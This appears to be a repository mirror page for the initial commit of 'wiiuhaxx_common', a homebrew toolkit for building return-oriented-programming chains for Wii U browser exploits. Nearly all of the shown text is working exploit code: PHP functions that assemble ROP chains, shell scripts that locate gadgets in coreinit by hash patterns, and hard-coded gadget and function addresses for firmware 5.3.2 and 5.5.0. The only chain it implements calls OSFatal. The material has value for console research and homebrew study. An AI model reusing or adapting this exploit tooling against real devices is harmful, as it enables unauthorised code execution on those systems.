mirror of
https://github.com/wiiu-env/wiiuhaxx_common.git
synced 2024-12-18 12:11:50 +01:00
Initial commit.
This commit is contained in:
commit
426271972c
6
README.md
Normal file
6
README.md
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
This is a common codebase for generating ROP-chains/etc for Wii U exploits. This uses addresses auto-located from coreinit. Currently only binary ROP-chains are supported.
|
||||||
|
|
||||||
|
You must specify the "sysver={val}" URL parameter for pages using this codebase, for selecting your Wii U system-version:
|
||||||
|
* "532": 5.3.2
|
||||||
|
* "550": 5.5.0
|
||||||
|
|
131
wiiu_browserhax_common.php
Normal file
131
wiiu_browserhax_common.php
Normal file
@ -0,0 +1,131 @@
|
|||||||
|
<?php
|
||||||
|
|
||||||
|
if(!isset($sysver))$sysver = -1;
|
||||||
|
|
||||||
|
if(isset($_REQUEST['sysver']))
|
||||||
|
{
|
||||||
|
if($_REQUEST['sysver']==="532")
|
||||||
|
{
|
||||||
|
$sysver = 532;
|
||||||
|
}
|
||||||
|
else if($_REQUEST['sysver']==="550")
|
||||||
|
{
|
||||||
|
$sysver = 550;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if($sysver===-1)die("The system-version must be specified via an URL parameter.");
|
||||||
|
|
||||||
|
require_once("wiiuhaxx_rop_sysver_$sysver.php");
|
||||||
|
|
||||||
|
$ropchainselect = -1;
|
||||||
|
if($ropchainselect == -1)
|
||||||
|
{
|
||||||
|
$ropchainselect = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if(!isset($generatebinrop))$generatebinrop = 0;
|
||||||
|
|
||||||
|
/*
|
||||||
|
Documentation for the addrs loaded from the above:
|
||||||
|
|
||||||
|
$ROP_POPJUMPLR_STACK12 Load LR from stackreg+12, add stackreg with 8, then jump to LR.
|
||||||
|
$ROP_POPJUMPLR_STACK20 Add stackreg with 16, load LR from stackreg+4 then jump to LR.
|
||||||
|
$ROP_CALLFUNC Call the code with the address stored in r27, with: r3=r29, r4=r31, r5=r25, r6=r24, r7=r28. Then once it returns from that code: r3=r29. Load r20..r31 from the data starting at stackreg+8. Load LR from stackreg+60, add stackreg with 56, then jump to LR.
|
||||||
|
$ROP_CALLR28_POP_R28_TO_R31 Set r4 to r31, then call the code with the address stored in r28. Load r28..r31 from the data starting at stackreg+8. Load LR from stackreg+28. Add stackreg with 24, then jump to LR.
|
||||||
|
$ROP_POP_R28R29R30R31 Load r28..r31 from the data starting at stackreg+8. Load LR from stackreg+28, add stackreg with 24, then jump to LR.
|
||||||
|
$ROP_POP_R27 Load r27 from stackreg+12. Load LR from stackreg+36, add stackreg with 32, then jump to LR.
|
||||||
|
$ROP_POP_R24_TO_R31 Load r24..r31 with the data starting at stackreg+16. Load LR from stackreg+52. Add stackreg with 48, then jump to LR.
|
||||||
|
|
||||||
|
$ROP_memcpy Address of "memcpy" in coreinit.
|
||||||
|
$ROP_DCFlushRange Address of "DCFlushRange" in coreinit. void DCFlushRange(const void *addr, size_t length);
|
||||||
|
$ROP_ICInvalidateRange Address of "ICInvalidateRange" in coreinit. void ICInvalidateRange(const void *addr, size_t length);
|
||||||
|
$ROP_OSSwitchSecCodeGenMode Address of "OSSwitchSecCodeGenMode" in coreinit. OSSwitchSecCodeGenMode(bool execute)
|
||||||
|
$ROP_OSSetThreadAffinity Address of "OSSetThreadAffinity" in coreinit. OSSetThreadAffinity(OSThread* thread, u32 affinity)
|
||||||
|
$ROP_OSYieldThread Address of "OSYieldThread" in coreinit. OSYieldThread(void)
|
||||||
|
$ROP_OSFatal Address of "$ROP_OSFatal" in coreinit.
|
||||||
|
*/
|
||||||
|
|
||||||
|
function genu32_unicode($value)//This would need updated to support big-endian.
|
||||||
|
{
|
||||||
|
$hexstr = sprintf("%08x", $value);
|
||||||
|
$outstr = "\u" . substr($hexstr, 4, 4) . "\u" . substr($hexstr, 0, 4);
|
||||||
|
return $outstr;
|
||||||
|
}
|
||||||
|
function genu32_unicode_jswrap($value)
|
||||||
|
{
|
||||||
|
$str = "\"" . genu32_unicode($value) . "\"";
|
||||||
|
return $str;
|
||||||
|
}
|
||||||
|
function ropchain_appendu32($val)
|
||||||
|
{
|
||||||
|
global $ROPCHAIN, $generatebinrop;
|
||||||
|
if($generatebinrop==0)
|
||||||
|
{
|
||||||
|
$ROPCHAIN.= genu32_unicode($val);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$ROPCHAIN.= pack("N*", $val);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function generate_ropchain()
|
||||||
|
{
|
||||||
|
global $ROPCHAIN, $generatebinrop, $ropchainselect;
|
||||||
|
|
||||||
|
$ROPCHAIN = "";
|
||||||
|
|
||||||
|
if($generatebinrop==0)$ROPCHAIN .= "\"";
|
||||||
|
|
||||||
|
if($ropchainselect==1)
|
||||||
|
{
|
||||||
|
generateropchain_type1();
|
||||||
|
}
|
||||||
|
|
||||||
|
if($generatebinrop==0)$ROPCHAIN.= "\"";
|
||||||
|
}
|
||||||
|
|
||||||
|
function ropgen_pop_r24_to_r31($inputregs)
|
||||||
|
{
|
||||||
|
global $ROP_POP_R24_TO_R31;
|
||||||
|
|
||||||
|
ropchain_appendu32($ROP_POP_R24_TO_R31);
|
||||||
|
ropchain_appendu32(0x0);
|
||||||
|
ropchain_appendu32(0x0);
|
||||||
|
for($i=0; $i<(32-24); $i++)ropchain_appendu32($inputregs[$i]);
|
||||||
|
ropchain_appendu32(0x0);
|
||||||
|
}
|
||||||
|
|
||||||
|
function ropgen_callfunc($funcaddr, $r3, $r4, $r5, $r6)
|
||||||
|
{
|
||||||
|
global $ROP_CALLR28_POP_R28_TO_R31, $ROP_CALLFUNC;
|
||||||
|
|
||||||
|
$inputregs = array();
|
||||||
|
$inputregs[24 - 24] = $r6;//r24 / r6
|
||||||
|
$inputregs[25 - 24] = $r5;//r25 / r5
|
||||||
|
$inputregs[26 - 24] = 0x0;//r26
|
||||||
|
$inputregs[27 - 24] = $ROP_CALLR28_POP_R28_TO_R31;//r27
|
||||||
|
$inputregs[28 - 24] = $funcaddr;//r28 / r7
|
||||||
|
$inputregs[29 - 24] = $r3;//r29 / r3
|
||||||
|
$inputregs[30 - 24] = 0x0;//r30
|
||||||
|
$inputregs[31 - 24] = $r4;//r31 / r4
|
||||||
|
|
||||||
|
ropgen_pop_r24_to_r31($inputregs);
|
||||||
|
|
||||||
|
ropchain_appendu32($ROP_CALLFUNC);
|
||||||
|
|
||||||
|
ropchain_appendu32(0x0);//r28
|
||||||
|
ropchain_appendu32(0x0);//r29
|
||||||
|
ropchain_appendu32(0x0);//r30
|
||||||
|
ropchain_appendu32(0x0);//r31
|
||||||
|
ropchain_appendu32(0x0);
|
||||||
|
}
|
||||||
|
|
||||||
|
function generateropchain_type1()
|
||||||
|
{
|
||||||
|
global $ROP_OSFatal;
|
||||||
|
ropgen_callfunc($ROP_OSFatal, 0x14572D28, 0x0, 0x0, 0x0);//OSFatal(<data from the haxx>);
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
3
wiiuhaxx_buildropversions.sh
Executable file
3
wiiuhaxx_buildropversions.sh
Executable file
@ -0,0 +1,3 @@
|
|||||||
|
./wiiuhaxx_locaterop.sh $1/v11464 0x0101c400 > wiiuhaxx_rop_sysver_532.php
|
||||||
|
./wiiuhaxx_locaterop.sh $1/v15702 0x0101c400 > wiiuhaxx_rop_sysver_550.php
|
||||||
|
|
22
wiiuhaxx_locaterop.sh
Executable file
22
wiiuhaxx_locaterop.sh
Executable file
@ -0,0 +1,22 @@
|
|||||||
|
ospath=$1
|
||||||
|
coreinit_textaddr=$2
|
||||||
|
|
||||||
|
powerpc-eabi-objcopy --change-section-address .text=$coreinit_textaddr $ospath/coreinit.elf $ospath/coreinit_reloc.elf
|
||||||
|
|
||||||
|
function getcoreinit_symboladdr
|
||||||
|
{
|
||||||
|
val=`powerpc-eabi-readelf -a $ospath/coreinit_reloc.elf | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
|
||||||
|
echo "$2 = 0x$val;"
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<?php"
|
||||||
|
ropgadget_patternfinder $1/coreinit.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script
|
||||||
|
echo ""
|
||||||
|
getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
|
||||||
|
getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
|
||||||
|
getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
|
||||||
|
getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
|
||||||
|
getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
|
||||||
|
getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
|
||||||
|
getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
|
||||||
|
echo "?>"
|
7
wiiuhaxx_locaterop_script
Normal file
7
wiiuhaxx_locaterop_script
Normal file
@ -0,0 +1,7 @@
|
|||||||
|
--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
|
||||||
|
--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
|
||||||
|
--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
|
||||||
|
--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
|
||||||
|
--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
|
||||||
|
--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
|
||||||
|
--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
|
17
wiiuhaxx_rop_sysver_532.php
Normal file
17
wiiuhaxx_rop_sysver_532.php
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
<?php
|
||||||
|
$ROP_POPJUMPLR_STACK12 = 0x0101cd14;
|
||||||
|
$ROP_POPJUMPLR_STACK20 = 0x01024d28;
|
||||||
|
$ROP_CALLFUNC = 0x0107f82c;
|
||||||
|
$ROP_CALLR28_POP_R28_TO_R31 = 0x0107d328;
|
||||||
|
$ROP_POP_R28R29R30R31 = 0x0101d8c4;
|
||||||
|
$ROP_POP_R27 = 0x0101caf0;
|
||||||
|
$ROP_POP_R24_TO_R31 = 0x0102042c;
|
||||||
|
|
||||||
|
$ROP_memcpy = 0x01035a68;
|
||||||
|
$ROP_DCFlushRange = 0x01023ee8;
|
||||||
|
$ROP_ICInvalidateRange = 0x01024010;
|
||||||
|
$ROP_OSSwitchSecCodeGenMode = 0x010370c0;
|
||||||
|
$ROP_OSSetThreadAffinity = 0x01042284;
|
||||||
|
$ROP_OSYieldThread = 0x01041250;
|
||||||
|
$ROP_OSFatal = 0x01031368;
|
||||||
|
?>
|
17
wiiuhaxx_rop_sysver_550.php
Normal file
17
wiiuhaxx_rop_sysver_550.php
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
<?php
|
||||||
|
$ROP_POPJUMPLR_STACK12 = 0x0101cd24;
|
||||||
|
$ROP_POPJUMPLR_STACK20 = 0x01024d88;
|
||||||
|
$ROP_CALLFUNC = 0x01080274;
|
||||||
|
$ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
|
||||||
|
$ROP_POP_R28R29R30R31 = 0x0101d8d4;
|
||||||
|
$ROP_POP_R27 = 0x0101cb00;
|
||||||
|
$ROP_POP_R24_TO_R31 = 0x010204c8;
|
||||||
|
|
||||||
|
$ROP_memcpy = 0x01035fc8;
|
||||||
|
$ROP_DCFlushRange = 0x01023f88;
|
||||||
|
$ROP_ICInvalidateRange = 0x010240b0;
|
||||||
|
$ROP_OSSwitchSecCodeGenMode = 0x010376c0;
|
||||||
|
$ROP_OSSetThreadAffinity = 0x010429dc;
|
||||||
|
$ROP_OSYieldThread = 0x010418e4;
|
||||||
|
$ROP_OSFatal = 0x01031618;
|
||||||
|
?>
|
Loading…
Reference in New Issue
Block a user